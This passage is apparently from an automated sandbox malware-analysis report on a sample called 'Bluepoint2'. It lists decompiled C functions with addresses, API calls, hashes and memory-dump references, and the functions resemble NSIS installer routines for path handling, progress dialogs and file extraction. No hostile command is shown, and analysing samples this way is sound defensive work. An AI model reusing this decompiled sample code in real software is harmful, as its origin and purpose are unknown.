                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                                                                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                    0x004068f1
                                                                                                                                    0x004068fa
                                                                                                                                    0x00406911
                                                                                                                                    0x00406911
                                                                                                                                    0x00406918
                                                                                                                                    0x00406924
                                                                                                                                    0x00406924
                                                                                                                                    0x00406927
                                                                                                                                    0x0040692a
                                                                                                                                    0x0040692f
                                                                                                                                    0x00406931
                                                                                                                                    0x0040693a
                                                                                                                                    0x0040693e
                                                                                                                                    0x0040695b
                                                                                                                                    0x00406963
                                                                                                                                    0x00406963
                                                                                                                                    0x00406968
                                                                                                                                    0x0040696a
                                                                                                                                    0x0040696d
                                                                                                                                    0x00406972
                                                                                                                                    0x00406973
                                                                                                                                    0x00406977
                                                                                                                                    0x00406977
                                                                                                                                    0x00406978
                                                                                                                                    0x0040697f
                                                                                                                                    0x00406981
                                                                                                                                    0x00406988
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406990
                                                                                                                                    0x00406996
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406996
                                                                                                                                    0x0040699b

                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77133420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                                    • CharNextW.USER32(?,00000000,77133420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                                    • CharPrevW.USER32(?,?,77133420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 589700163-2977677972
                                                                                                                                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                                                                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a26c;
				if(_t6 >  *0x42a26c) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a314 & 0x00000001;
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                                                                    0x0040303d
                                                                                                                                    0x0040303f
                                                                                                                                    0x00403046
                                                                                                                                    0x00403049
                                                                                                                                    0x00403049
                                                                                                                                    0x0040304f
                                                                                                                                    0x00000000
                                                                                                                                    0x0040304f
                                                                                                                                    0x00403057
                                                                                                                                    0x0040305d
                                                                                                                                    0x00000000
                                                                                                                                    0x00403060
                                                                                                                                    0x00403067
                                                                                                                                    0x0040306d
                                                                                                                                    0x00403073
                                                                                                                                    0x00403075
                                                                                                                                    0x0040307b
                                                                                                                                    0x004030b9
                                                                                                                                    0x004030c2
                                                                                                                                    0x00000000
                                                                                                                                    0x004030c7
                                                                                                                                    0x0040307d
                                                                                                                                    0x00403084
                                                                                                                                    0x00403095
                                                                                                                                    0x00000000
                                                                                                                                    0x004030a3
                                                                                                                                    0x00403084
                                                                                                                                    0x004030cf

                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403067
                                                                                                                                    • wsprintfW.USER32 ref: 00403095
                                                                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                                                      • Part of subcall function 00403012: MulDiv.KERNEL32(00023252,00000064,000230A5), ref: 00403027
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                    • String ID: ... %d%%
                                                                                                                                    • API String ID: 722711167-2449383134
                                                                                                                                    • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                                                                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                                                                    • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                                                                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                    0x00404f8d
                                                                                                                                    0x00404f9a
                                                                                                                                    0x00404fa0
                                                                                                                                    0x00404fde
                                                                                                                                    0x00404fde
                                                                                                                                    0x00404fed
                                                                                                                                    0x00404ff4
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ff6
                                                                                                                                    0x00404fa2
                                                                                                                                    0x00404fb1
                                                                                                                                    0x00404fb9
                                                                                                                                    0x00404fbc
                                                                                                                                    0x00404fce
                                                                                                                                    0x00404fd4
                                                                                                                                    0x00404fdb
                                                                                                                                    0x00000000
                                                                                                                                    0x00404fdb
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                                                                    • GetMessagePos.USER32 ref: 00404FA2
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                                                                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                                    0x00402fa3
                                                                                                                                    0x00402fb1
                                                                                                                                    0x00402fb7
                                                                                                                                    0x00402fb7
                                                                                                                                    0x00402fc5
                                                                                                                                    0x00402fc7
                                                                                                                                    0x00402fd3
                                                                                                                                    0x00402fd8
                                                                                                                                    0x00402fda
                                                                                                                                    0x00402fda
                                                                                                                                    0x00402fe5
                                                                                                                                    0x00402ff5
                                                                                                                                    0x00403007
                                                                                                                                    0x00403007
                                                                                                                                    0x0040300f

                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                    • wsprintfW.USER32 ref: 00402FE5
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                                                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                                                                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C2655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                    			E713C2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E713C12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M713C2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x713c407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x713c409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E713C1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x713c506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x713c506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x713c506c);
								goto L17;
							case 5:
								_push( *0x713c506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x713c5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E713C1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E713C1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                                                                    0x713c265f
                                                                                                                                    0x713c2661
                                                                                                                                    0x713c2665
                                                                                                                                    0x713c2674
                                                                                                                                    0x713c2678
                                                                                                                                    0x713c267d
                                                                                                                                    0x713c267d
                                                                                                                                    0x713c2685
                                                                                                                                    0x713c268c
                                                                                                                                    0x713c2692
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2699
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c26a1
                                                                                                                                    0x713c26a5
                                                                                                                                    0x713c26a8
                                                                                                                                    0x713c26ac
                                                                                                                                    0x713c26b3
                                                                                                                                    0x713c26b7
                                                                                                                                    0x713c26bd
                                                                                                                                    0x713c26bf
                                                                                                                                    0x713c26c1
                                                                                                                                    0x713c26c1
                                                                                                                                    0x713c26c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c26d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c26d8
                                                                                                                                    0x713c26de
                                                                                                                                    0x713c26e8
                                                                                                                                    0x713c26ee
                                                                                                                                    0x713c26f3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2714
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c26fa
                                                                                                                                    0x713c2700
                                                                                                                                    0x713c2701
                                                                                                                                    0x713c2703
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c271c
                                                                                                                                    0x713c271e
                                                                                                                                    0x713c2724
                                                                                                                                    0x713c272a
                                                                                                                                    0x713c272a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2692
                                                                                                                                    0x713c272d
                                                                                                                                    0x713c272d
                                                                                                                                    0x713c2732
                                                                                                                                    0x713c2743
                                                                                                                                    0x713c2743
                                                                                                                                    0x713c2749
                                                                                                                                    0x713c274e
                                                                                                                                    0x713c2753
                                                                                                                                    0x713c275f
                                                                                                                                    0x713c2764
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2769
                                                                                                                                    0x713c2755
                                                                                                                                    0x713c2756
                                                                                                                                    0x713c276a
                                                                                                                                    0x713c276a
                                                                                                                                    0x713c2753
                                                                                                                                    0x713c276b
                                                                                                                                    0x713c276c
                                                                                                                                    0x713c276f
                                                                                                                                    0x713c2783

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 713C12BB: GlobalAlloc.KERNELBASE(00000040,?,713C12DB,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12C5
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 713C2743
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C2778
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: 2c0fc03926895cc48cf72fe40495d8afb31c2761f38655dc677ba4f6cd7dbe85
                                                                                                                                    • Instruction ID: bdead8be0aca97e30627cb3385e843261c6cadad4254dceff9dd448b97eba86b
                                                                                                                                    • Opcode Fuzzy Hash: 2c0fc03926895cc48cf72fe40495d8afb31c2761f38655dc677ba4f6cd7dbe85
                                                                                                                                    • Instruction Fuzzy Hash: D131CB72208116EFD7168F65C9C4D2ABBBBFB86B08324452DF542832E1CB31EC199B61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                                                                    0x00402950
                                                                                                                                    0x00402952
                                                                                                                                    0x00402957
                                                                                                                                    0x0040295c
                                                                                                                                    0x0040295f
                                                                                                                                    0x00402969
                                                                                                                                    0x0040296d
                                                                                                                                    0x0040296d
                                                                                                                                    0x00402973
                                                                                                                                    0x00402980
                                                                                                                                    0x00402988
                                                                                                                                    0x0040298b
